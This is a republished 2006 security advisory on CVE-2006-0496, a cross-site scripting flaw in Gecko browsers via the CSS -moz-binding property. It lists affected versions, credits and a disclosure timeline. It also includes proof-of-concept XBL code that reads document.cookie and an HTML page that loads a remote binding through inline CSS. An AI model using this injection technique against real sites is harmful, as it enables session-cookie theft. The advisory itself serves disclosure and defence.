‘Gecko Based Browsers -moz-binding XSS’

Published on February 2nd, 2006
Summary

XBL is a markup language for describing bindings that can be attached to elements in other documents.’ ‘The value of the -moz-binding property is a set of URLs that identify specific bindings. An individual URL in the set consists of the binding document’s URL and the binding’s document-unique identifier.’

By crafting special XBL code, attackers can execute XSS using the -moz-binding option on Gecko based web browsers.’

Credit:

‘The information has been provided by Juha-Matti Laurio.
The bug report can be found at: https://bugzilla.mozilla.org/show_bug.cgi?id=324253
A blog about the vulnerability can be found at: http://community.livejournal.com/lj_dev/708069.html


Details

Vulnerable Systems:
 * Mozilla Firefox 1.5 and prior
 * Mozilla Firefox 1.0 and above
 * Netscape version 8.1 and prior
 * Mozilla Suite version 1.7.12 and prior
 * Mozilla Seamonkey 1.0

Gecko based browsers uses the CSS option -moz-binding in order to bind XBL code from additional locations including remote hosts.
Attackers can use the -moz-binding option in order to inject Javascript code and to perform a cross site scripting attack from remote location.

Proof of Concept:
Cookie reading:
< !–
 this must be served with Content-type: text/xml or similar
— >

< bindings>
  < binding id=’exploit’>
    < implementation>
       < constructor>
          //
                function exploitMe( element ) {
                    element.innerHTML = ‘Attempting to read cookie data…’;

                    var data;
                    try {
                        data = document.cookie || ‘No cookie data.’;
                    } catch( e ) {
                        data = ‘Unable to read cookie.’
                    }

                    element.innerHTML = data;
                    element.style.color = ‘green’;
                }

                exploitMe( this );
                //
   < / constructor>
  < / implementation>
 < / binding>
< / bindings>

Remote loading of script file:
< ! DOCTYPE html PUBLIC ‘-//W3C//DTD XHTML 1.0 Transitional//EN’ ‘http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd’>
< html >
    < head>
        < meta http-equiv=’Content-Type’ content=’text/html; charset=utf-8′ />
        < title>Cookie Exploit< /title>
    < / head>
    < body>
        < h1>Cookie Exploit using CSS< / h1>
        < p style=’color: red; -moz-binding: url(https://bugzilla.mozilla.org/attachment.cgi?id=209238#exploit); behavior: url(https://bugzilla.mozilla.org/attachment.cgi?id=209240);’>
            This is a paragraph with inline exploit CSS.
            The CSS executes JavaScript that can read cookies.
        < / p>
    < / body>
< / html>

CVE Information:
CVE-2006-0496

Disclosure Timeline:
1-Feb-2006 – Vulnerability researched and confirmed
2-Feb-2006 – Detailed research
2-Feb-2006 – Vendor contacted
2-Feb-2006 – Security companies and several CERT units contacted’

Categories: News
Tags:

Related Posts

News

Zoho ManageEngine OpManager before 12.4 Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) Vulnerability

News

MiniShare 1.4.1 Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability

News

NETGEAR JNR1010 devices before 1.0.0.32 Cross-Site Request Forgery (CSRF) Vulnerability